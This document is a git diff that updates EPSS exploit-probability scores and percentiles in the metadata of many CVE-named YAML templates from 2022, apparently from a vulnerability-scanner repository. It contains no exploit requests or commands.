CVE-2022-2488 cwe-id: CWE-78 epss-score: 0.93197 - epss-percentile: 0.99785 + epss-percentile: 0.99784 cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24899.yaml b/http/cves/2022/CVE-2022-24899.yaml index ab59ab0b01a..39884eceae8 100644 --- a/http/cves/2022/CVE-2022-24899.yaml +++ b/http/cves/2022/CVE-2022-24899.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-24899 cwe-id: CWE-79 epss-score: 0.59505 - epss-percentile: 0.98172 + epss-percentile: 0.98174 cpe: cpe:2.3:a:contao:contao:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-25148.yaml b/http/cves/2022/CVE-2022-25148.yaml index ee1c7ef5bf4..e8f6460f632 100644 --- a/http/cves/2022/CVE-2022-25148.yaml +++ b/http/cves/2022/CVE-2022-25148.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-25148 cwe-id: CWE-89 epss-score: 0.48461 - epss-percentile: 0.97653 + epss-percentile: 0.97648 cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25322.yaml b/http/cves/2022/CVE-2022-25322.yaml index 4159ab1fc69..6a6e6ee4260 100644 --- a/http/cves/2022/CVE-2022-25322.yaml +++ b/http/cves/2022/CVE-2022-25322.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-25322 cwe-id: CWE-89 epss-score: 0.52702 - epss-percentile: 0.97849 + epss-percentile: 0.97845 cpe: cpe:2.3:a:zerof:web_server:2.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-2535.yaml b/http/cves/2022/CVE-2022-2535.yaml index ebe3edd1125..530bb00418e 100644 --- a/http/cves/2022/CVE-2022-2535.yaml +++ b/http/cves/2022/CVE-2022-2535.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-2535 cwe-id: CWE-639 epss-score: 0.09769 - epss-percentile: 0.92716 + epss-percentile: 0.92711 cpe: cpe:2.3:a:searchwp:searchwp_live_ajax_search:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2544.yaml b/http/cves/2022/CVE-2022-2544.yaml index a621c600b70..2fcc9f471b5 100644 --- a/http/cves/2022/CVE-2022-2544.yaml +++ b/http/cves/2022/CVE-2022-2544.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-2544 cwe-id: CWE-425 epss-score: 0.50013 - epss-percentile: 0.97729 + epss-percentile: 0.97723 cpe: cpe:2.3:a:wpmanageninja:ninja_job_board:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2546.yaml b/http/cves/2022/CVE-2022-2546.yaml index 840c1917a50..5d92f84895b 100644 --- a/http/cves/2022/CVE-2022-2546.yaml +++ b/http/cves/2022/CVE-2022-2546.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-2546 cwe-id: CWE-79 epss-score: 0.54546 - epss-percentile: 0.97944 + epss-percentile: 0.97942 cpe: cpe:2.3:a:servmask:all-in-one_wp_migration:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25481.yaml b/http/cves/2022/CVE-2022-25481.yaml index 17862b7fc72..819ba1e1acf 100644 --- a/http/cves/2022/CVE-2022-25481.yaml +++ b/http/cves/2022/CVE-2022-25481.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-25481 cwe-id: CWE-668 epss-score: 0.20316 - epss-percentile: 0.95336 + epss-percentile: 0.95337 cpe: cpe:2.3:a:thinkphp:thinkphp:5.0.24:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25489.yaml b/http/cves/2022/CVE-2022-25489.yaml index 06427be5296..2a2e789e365 100644 --- a/http/cves/2022/CVE-2022-25489.yaml +++ b/http/cves/2022/CVE-2022-25489.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-25489 cwe-id: CWE-79 epss-score: 0.08481 - epss-percentile: 0.92093 + epss-percentile: 0.92087 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25497.yaml b/http/cves/2022/CVE-2022-25497.yaml index d05379d6c40..0008310740a 100644 --- a/http/cves/2022/CVE-2022-25497.yaml +++ b/http/cves/2022/CVE-2022-25497.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-25497 cwe-id: CWE-552 epss-score: 0.22187 - epss-percentile: 0.95615 + epss-percentile: 0.95619 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2551.yaml b/http/cves/2022/CVE-2022-2551.yaml index 8911b5d48fe..abb196b53f6 100644 --- a/http/cves/2022/CVE-2022-2551.yaml +++ b/http/cves/2022/CVE-2022-2551.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-2551 cwe-id: CWE-425 epss-score: 0.64813 - epss-percentile: 0.98401 + epss-percentile: 0.98404 cpe: cpe:2.3:a:snapcreek:duplicator:*:*:*:*:lite:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2552.yaml b/http/cves/2022/CVE-2022-2552.yaml index 6597b57ff01..9018c0b6e4a 100644 --- a/http/cves/2022/CVE-2022-2552.yaml +++ b/http/cves/2022/CVE-2022-2552.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-2552 cwe-id: CWE-862 epss-score: 0.48477 - epss-percentile: 0.97653 + epss-percentile: 0.97648 cpe: cpe:2.3:a:snapcreek:duplicator:*:*:*:*:lite:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2599.yaml b/http/cves/2022/CVE-2022-2599.yaml index a0477a097ab..7efd92c4d94 100644 --- a/http/cves/2022/CVE-2022-2599.yaml +++ b/http/cves/2022/CVE-2022-2599.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-2599 cwe-id: CWE-79 epss-score: 0.47329 - epss-percentile: 0.97595 + epss-percentile: 0.9759 cpe: cpe:2.3:a:anti-malware_security_and_brute-force_firewall_project:anti-malware_security_and_brute-force_firewall:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-26134.yaml b/http/cves/2022/CVE-2022-26134.yaml index 4363cfee4ff..1ef0013d6ea 100644 --- a/http/cves/2022/CVE-2022-26134.yaml +++ b/http/cves/2022/CVE-2022-26134.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-26134 cwe-id: CWE-917 - epss-score: 0.94408 - epss-percentile: 0.99975 + epss-score: 0.94446 + epss-percentile: 0.99989 cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-26148.yaml b/http/cves/2022/CVE-2022-26148.yaml index f57b2dd9fe2..2c43535230d 100644 --- a/http/cves/2022/CVE-2022-26148.yaml +++ b/http/cves/2022/CVE-2022-26148.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-26148 cwe-id: CWE-312 epss-score: 0.87108 - epss-percentile: 0.99419 + epss-percentile: 0.99421 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-26159.yaml b/http/cves/2022/CVE-2022-26159.yaml index ed9f1b74476..56e9442ac4e 100644 --- a/http/cves/2022/CVE-2022-26159.yaml +++ b/http/cves/2022/CVE-2022-26159.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-26159 cwe-id: CWE-425 epss-score: 0.88594 - epss-percentile: 0.99485 + epss-percentile: 0.99484 cpe: cpe:2.3:a:ametys:ametys:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-26263.yaml b/http/cves/2022/CVE-2022-26263.yaml index 8e8e1bffd5d..ccfcbc6c920 100644 --- a/http/cves/2022/CVE-2022-26263.yaml +++ b/http/cves/2022/CVE-2022-26263.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-26263 cwe-id: CWE-79 epss-score: 0.10825 - epss-percentile: 0.93143 + epss-percentile: 0.93137 cpe: cpe:2.3:a:yonyou:u8\+:13.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2627.yaml b/http/cves/2022/CVE-2022-2627.yaml index 8f09182fb4c..77de222e1cf 100644 --- a/http/cves/2022/CVE-2022-2627.yaml +++ b/http/cves/2022/CVE-2022-2627.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-2627 cwe-id: CWE-79 epss-score: 0.23643 - epss-percentile: 0.95808 + epss-percentile: 0.95812 cpe: cpe:2.3:a:tagdiv:newspaper:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-26271.yaml b/http/cves/2022/CVE-2022-26271.yaml index 900dc4af4cf..c6da3b9a288 100644 --- a/http/cves/2022/CVE-2022-26271.yaml +++ b/http/cves/2022/CVE-2022-26271.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-26271 cwe-id: CWE-552 epss-score: 0.21262 - epss-percentile: 0.95499 + epss-percentile: 0.95501 cpe: cpe:2.3:a:74cms:74cms:3.4.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-2633.yaml b/http/cves/2022/CVE-2022-2633.yaml index 68b035ec3d9..a96e72ece24 100644 --- a/http/cves/2022/CVE-2022-2633.yaml +++ b/http/cves/2022/CVE-2022-2633.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-2633 cwe-id: CWE-610 epss-score: 0.89676 - epss-percentile: 0.9954 + epss-percentile: 0.99542 cpe: cpe:2.3:a:plugins360:all-in-one_video_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-26564.yaml b/http/cves/2022/CVE-2022-26564.yaml index d7b593f8ec0..e1802f98c1c 100644 --- a/http/cves/2022/CVE-2022-26564.yaml +++ b/http/cves/2022/CVE-2022-26564.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-26564 cwe-id: CWE-79 epss-score: 0.00684 - epss-percentile: 0.71156 + epss-percentile: 0.71132 cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.3:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2022/CVE-2022-26585.yaml b/http/cves/2022/CVE-2022-26585.yaml index d58a879a15d..69e4ddcddb8 100644 --- a/http/cves/2022/CVE-2022-26585.yaml +++ b/http/cves/2022/CVE-2022-26585.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-26585 cwe-id: CWE-89 epss-score: 0.44893 - epss-percentile: 0.9747 + epss-percentile: 0.97467 cpe: cpe:2.3:a:mingsoft:mcms:5.2.7:*:*:*:*:*:*:* metadata: vendor: mingsoft diff --git a/http/cves/2022/CVE-2022-2733.yaml b/http/cves/2022/CVE-2022-2733.yaml index 6d96d3cb156..47fdec6327b 100644 --- a/http/cves/2022/CVE-2022-2733.yaml +++ b/http/cves/2022/CVE-2022-2733.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-2733 cwe-id: CWE-79 epss-score: 0.89261 - epss-percentile: 0.99519 + epss-percentile: 0.99521 cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2756.yaml b/http/cves/2022/CVE-2022-2756.yaml index 92f719dd654..9289e5b86b9 100644 --- a/http/cves/2022/CVE-2022-2756.yaml +++ b/http/cves/2022/CVE-2022-2756.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-2756 cwe-id: CWE-918 epss-score: 0.67466 - epss-percentile: 0.98514 + epss-percentile: 0.98516 cpe: cpe:2.3:a:kavitareader:kavita:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-27849.yaml b/http/cves/2022/CVE-2022-27849.yaml index 58a2132108f..03990ed3d21 100644 --- a/http/cves/2022/CVE-2022-27849.yaml +++ b/http/cves/2022/CVE-2022-27849.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-27849 cwe-id: CWE-200 epss-score: 0.12777 - epss-percentile: 0.93791 + epss-percentile: 0.93786 cpe: cpe:2.3:a:plugin-planet:simple_ajax_chat:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-27924.yaml b/http/cves/2022/CVE-2022-27924.yaml index 3c4beffbde0..42fb0400f66 100644 --- a/http/cves/2022/CVE-2022-27924.yaml +++ b/http/cves/2022/CVE-2022-27924.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-27924 - epss-score: 0.91955 - epss-percentile: 0.9968 + epss-score: 0.913 + epss-percentile: 0.99634 cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-27927.yaml b/http/cves/2022/CVE-2022-27927.yaml index 649c72710c1..e5198c7a03a 100644 --- a/http/cves/2022/CVE-2022-27927.yaml +++ b/http/cves/2022/CVE-2022-27927.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-27927 cwe-id: CWE-89 epss-score: 0.7453 - epss-percentile: 0.98806 + epss-percentile: 0.98804 cpe: cpe:2.3:a:microfinance_management_system_project:microfinance_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-27984.yaml b/http/cves/2022/CVE-2022-27984.yaml index 9481d2788bb..1f9192956c7 100644 --- a/http/cves/2022/CVE-2022-27984.yaml +++ b/http/cves/2022/CVE-2022-27984.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-27984 cwe-id: CWE-89 epss-score: 0.24054 - epss-percentile: 0.95863 + epss-percentile: 0.95867 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-27985.yaml b/http/cves/2022/CVE-2022-27985.yaml index bcaa2d0e2da..f8c75405ffa 100644 --- a/http/cves/2022/CVE-2022-27985.yaml +++ b/http/cves/2022/CVE-2022-27985.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-27985 cwe-id: CWE-89 epss-score: 0.24054 - epss-percentile: 0.95863 + epss-percentile: 0.95867 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-28032.yaml b/http/cves/2022/CVE-2022-28032.yaml index 0991e60c452..115af54fcbd 100644 --- a/http/cves/2022/CVE-2022-28032.yaml +++ b/http/cves/2022/CVE-2022-28032.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-28032 cwe-id: CWE-89 epss-score: 0.46835 - epss-percentile: 0.9757 + epss-percentile: 0.97566 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-28079.yaml b/http/cves/2022/CVE-2022-28079.yaml index 2ba608831b5..b6f1446f7fb 100644 --- a/http/cves/2022/CVE-2022-28079.yaml +++ b/http/cves/2022/CVE-2022-28079.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-28079 cwe-id: CWE-89 - epss-score: 0.83475 - epss-percentile: 0.99254 + epss-score: 0.83545 + epss-percentile: 0.99257 cpe: cpe:2.3:a:college_management_system_project:college_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-28080.yaml b/http/cves/2022/CVE-2022-28080.yaml index e7cc0945b4e..69fb7a4d2c5 100644 --- a/http/cves/2022/CVE-2022-28080.yaml +++ b/http/cves/2022/CVE-2022-28080.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-28080 cwe-id: CWE-89 - epss-score: 0.7711 - epss-percentile: 0.98921 + epss-score: 0.62012 + epss-percentile: 0.98278 cpe: cpe:2.3:a:event_management_system_project:event_management_system:1.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-28117.yaml b/http/cves/2022/CVE-2022-28117.yaml index a44153e02bd..f1cdb1d44b5 100644 --- a/http/cves/2022/CVE-2022-28117.yaml +++ b/http/cves/2022/CVE-2022-28117.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-28117 cwe-id: CWE-918 epss-score: 0.67131 - epss-percentile: 0.98501 + epss-percentile: 0.98504 cpe: cpe:2.3:a:naviwebs:navigate_cms:2.9.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-28219.yaml b/http/cves/2022/CVE-2022-28219.yaml index bbeac39f85f..3f4a1ae583f 100644 --- a/http/cves/2022/CVE-2022-28219.yaml +++ b/http/cves/2022/CVE-2022-28219.yaml @@ -24,7 +24,7 @@ info: cve-id: CVE-2022-28219 cwe-id: CWE-611 epss-score: 0.94202 - epss-percentile: 0.99917 + epss-percentile: 0.99915 cpe: cpe:2.3:a:zohocorp:manageengine_adaudit_plus:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-28290.yaml b/http/cves/2022/CVE-2022-28290.yaml index 375cd26e656..924603d8b75 100644 --- a/http/cves/2022/CVE-2022-28290.yaml +++ b/http/cves/2022/CVE-2022-28290.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-28290 cwe-id: CWE-79 epss-score: 0.01901 - epss-percentile: 0.82793 + epss-percentile: 0.8279 cpe: cpe:2.3:a:welaunch:wordpress_country_selector:1.6.5:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-28508.yaml b/http/cves/2022/CVE-2022-28508.yaml index afeba85b30a..b7a99ee2534 100644 --- a/http/cves/2022/CVE-2022-28508.yaml +++ b/http/cves/2022/CVE-2022-28508.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-28508 cwe-id: CWE-79 epss-score: 0.01452 - epss-percentile: 0.80384 + epss-percentile: 0.80375 metadata: verified: true max-request: 1 diff --git a/http/cves/2022/CVE-2022-2863.yaml b/http/cves/2022/CVE-2022-2863.yaml index d6e25e06e14..8f95fa3b95f 100644 --- a/http/cves/2022/CVE-2022-2863.yaml +++ b/http/cves/2022/CVE-2022-2863.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-2863 cwe-id: CWE-22 epss-score: 0.06441 - epss-percentile: 0.90771 + epss-percentile: 0.9077 cpe: cpe:2.3:a:wpvivid:migration\,_backup\,_staging:*:*:*:*:*:wordpress:*:* metadata: max-request: 3 diff --git a/http/cves/2022/CVE-2022-28666.yaml b/http/cves/2022/CVE-2022-28666.yaml index 0b48bf696ff..583bade4d8c 100644 --- a/http/cves/2022/CVE-2022-28666.yaml +++ b/http/cves/2022/CVE-2022-28666.yaml @@ -17,7 +17,7 @@ info: cvss-score: 5.3 cve-id: CVE-2022-28666 epss-score: 0.12792 - epss-percentile: 0.93793 + epss-percentile: 0.93789 cwe-id: CWE-287 cpe: cpe:2.3:a:yikesinc:custom_product_tabs_for_woocommerce::::::wordpress::* metadata: diff --git a/http/cves/2022/CVE-2022-28923.yaml b/http/cves/2022/CVE-2022-28923.yaml index 3d7c473fe63..45b100aaeea 100644 --- a/http/cves/2022/CVE-2022-28923.yaml +++ b/http/cves/2022/CVE-2022-28923.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-28923 cwe-id: CWE-601 epss-score: 0.16987 - epss-percentile: 0.94763 + epss-percentile: 0.94761 cpe: cpe:2.3:a:caddyserver:caddy:2.4.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-28955.yaml b/http/cves/2022/CVE-2022-28955.yaml index fa32ab5e120..def41b4d77b 100644 --- a/http/cves/2022/CVE-2022-28955.yaml +++ b/http/cves/2022/CVE-2022-28955.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-28955 cwe-id: CWE-287 epss-score: 0.92711 - epss-percentile: 0.99738 + epss-percentile: 0.99737 cpe: cpe:2.3:o:dlink:dir-816l_firmware:206b01:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29005.yaml b/http/cves/2022/CVE-2022-29005.yaml index 75a2008bfed..6ed8c0d6f76 100644 --- a/http/cves/2022/CVE-2022-29005.yaml +++ b/http/cves/2022/CVE-2022-29005.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-29005 cwe-id: CWE-79 epss-score: 0.22122 - epss-percentile: 0.95605 + epss-percentile: 0.95609 cpe: cpe:2.3:a:phpgurukul:online_birth_certificate_system:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29006.yaml b/http/cves/2022/CVE-2022-29006.yaml index 540c0af2e6f..c26262f5e3c 100644 --- a/http/cves/2022/CVE-2022-29006.yaml +++ b/http/cves/2022/CVE-2022-29006.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-29006 cwe-id: CWE-89 epss-score: 0.85946 - epss-percentile: 0.9936 + epss-percentile: 0.99362 cpe: cpe:2.3:a:phpgurukul:directory_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29013.yaml b/http/cves/2022/CVE-2022-29013.yaml index 1324e14da02..5fd3d306df8 100644 --- a/http/cves/2022/CVE-2022-29013.yaml +++ b/http/cves/2022/CVE-2022-29013.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-29013 cwe-id: CWE-78 epss-score: 0.92694 - epss-percentile: 0.99738 + epss-percentile: 0.99737 cpe: cpe:2.3:h:razer:sila:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-29081.yaml b/http/cves/2022/CVE-2022-29081.yaml index e787a6296ad..942dfbabb18 100644 --- a/http/cves/2022/CVE-2022-29081.yaml +++ b/http/cves/2022/CVE-2022-29081.yaml @@ -19,7 +19,7 @@ info: cvss-score: 9.8 cve-id: CVE-2022-29081 epss-score: 0.81477 - epss-percentile: 0.99138 + epss-percentile: 0.99141 cwe-id: CWE-22 metadata: shodan-query: http.title:"manageengine" diff --git a/http/cves/2022/CVE-2022-29316.yaml b/http/cves/2022/CVE-2022-29316.yaml index f60c5fbf846..85f008b7b6d 100644 --- a/http/cves/2022/CVE-2022-29316.yaml +++ b/http/cves/2022/CVE-2022-29316.yaml @@ -18,7 +18,7 @@ info: cvss-score: 7.2 cve-id: CVE-2022-29316 epss-score: 0.54326 - epss-percentile: 0.97933 + epss-percentile: 0.97931 cwe-id: CWE-79 metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29349.yaml b/http/cves/2022/CVE-2022-29349.yaml index fc2e195ea02..419cd116681 100644 --- a/http/cves/2022/CVE-2022-29349.yaml +++ b/http/cves/2022/CVE-2022-29349.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-29349 cwe-id: CWE-79 epss-score: 0.02663 - epss-percentile: 0.85383 + epss-percentile: 0.85379 cpe: cpe:2.3:a:keking:kkfileview:4.0.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29383.yaml b/http/cves/2022/CVE-2022-29383.yaml index 328c0ce1af0..e8c3960e494 100644 --- a/http/cves/2022/CVE-2022-29383.yaml +++ b/http/cves/2022/CVE-2022-29383.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-29383 cwe-id: CWE-89 epss-score: 0.75246 - epss-percentile: 0.98835 + epss-percentile: 0.98833 cpe: cpe:2.3:o:netgear:ssl312_firmware:fvs336gv2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29455.yaml b/http/cves/2022/CVE-2022-29455.yaml index bbaa50a32a2..f6df564f634 100644 --- a/http/cves/2022/CVE-2022-29455.yaml +++ b/http/cves/2022/CVE-2022-29455.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-29455 cwe-id: CWE-79 epss-score: 0.52986 - epss-percentile: 0.97866 + epss-percentile: 0.97862 cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29548.yaml b/http/cves/2022/CVE-2022-29548.yaml index 7ec8e739a82..33beb0e0015 100644 --- a/http/cves/2022/CVE-2022-29548.yaml +++ b/http/cves/2022/CVE-2022-29548.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-29548 cwe-id: CWE-79 epss-score: 0.76361 - epss-percentile: 0.98889 + epss-percentile: 0.98888 cpe: cpe:2.3:a:wso2:api_manager:2.2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29775.yaml b/http/cves/2022/CVE-2022-29775.yaml index 36cd1ddf676..47fc0f6676b 100644 --- a/http/cves/2022/CVE-2022-29775.yaml +++ b/http/cves/2022/CVE-2022-29775.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-29775 cwe-id: CWE-287 epss-score: 0.5275 - epss-percentile: 0.97852 + epss-percentile: 0.97848 cpe: cpe:2.3:a:ispyconnect:ispy:7.2.2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30073.yaml b/http/cves/2022/CVE-2022-30073.yaml index dcba2d8ea96..aeb9cc19888 100644 --- a/http/cves/2022/CVE-2022-30073.yaml +++ b/http/cves/2022/CVE-2022-30073.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-30073 cwe-id: CWE-79 epss-score: 0.17607 - epss-percentile: 0.94881 + epss-percentile: 0.9488 cpe: cpe:2.3:a:wbce:wbce_cms:1.5.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30489.yaml b/http/cves/2022/CVE-2022-30489.yaml index b21fb3cea43..15d95af5bac 100644 --- a/http/cves/2022/CVE-2022-30489.yaml +++ b/http/cves/2022/CVE-2022-30489.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-30489 cwe-id: CWE-79 epss-score: 0.29079 - epss-percentile: 0.9643 + epss-percentile: 0.96435 cpe: cpe:2.3:o:wavlink:wn535g3_firmware:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30513.yaml b/http/cves/2022/CVE-2022-30513.yaml index 6fc92619e51..0a6b10da8d7 100644 --- a/http/cves/2022/CVE-2022-30513.yaml +++ b/http/cves/2022/CVE-2022-30513.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-30513 cwe-id: CWE-79 epss-score: 0.07297 - epss-percentile: 0.91409 + epss-percentile: 0.91407 cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30514.yaml b/http/cves/2022/CVE-2022-30514.yaml index 047fb86b468..7f61cc66afb 100644 --- a/http/cves/2022/CVE-2022-30514.yaml +++ b/http/cves/2022/CVE-2022-30514.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-30514 cwe-id: CWE-79 epss-score: 0.07297 - epss-percentile: 0.91409 + epss-percentile: 0.91407 cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30525.yaml b/http/cves/2022/CVE-2022-30525.yaml index b8a5102d1e9..8987c2cf955 100644 --- a/http/cves/2022/CVE-2022-30525.yaml +++ b/http/cves/2022/CVE-2022-30525.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-30525 cwe-id: CWE-78 epss-score: 0.94445 - epss-percentile: 0.9999 + epss-percentile: 0.99989 cpe: cpe:2.3:o:zyxel:usg_flex_100w_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-3062.yaml b/http/cves/2022/CVE-2022-3062.yaml index a633945d89b..d5920a74f0a 100644 --- a/http/cves/2022/CVE-2022-3062.yaml +++ b/http/cves/2022/CVE-2022-3062.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-3062 cwe-id: CWE-79 epss-score: 0.48658 - epss-percentile: 0.97661 + epss-percentile: 0.97656 cpe: cpe:2.3:a:simplefilelist:simple-file-list:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30776.yaml b/http/cves/2022/CVE-2022-30776.yaml index 5673cb51c67..0f17153aa1e 100644 --- a/http/cves/2022/CVE-2022-30776.yaml +++ b/http/cves/2022/CVE-2022-30776.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-30776 cwe-id: CWE-79 epss-score: 0.45526 - epss-percentile: 0.97504 + epss-percentile: 0.97499 cpe: cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31101.yaml b/http/cves/2022/CVE-2022-31101.yaml index b390ed9c5d7..133e1910b45 100644 --- a/http/cves/2022/CVE-2022-31101.yaml +++ b/http/cves/2022/CVE-2022-31101.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-31101 cwe-id: CWE-89 epss-score: 0.45139 - epss-percentile: 0.97489 + epss-percentile: 0.97483 cpe: 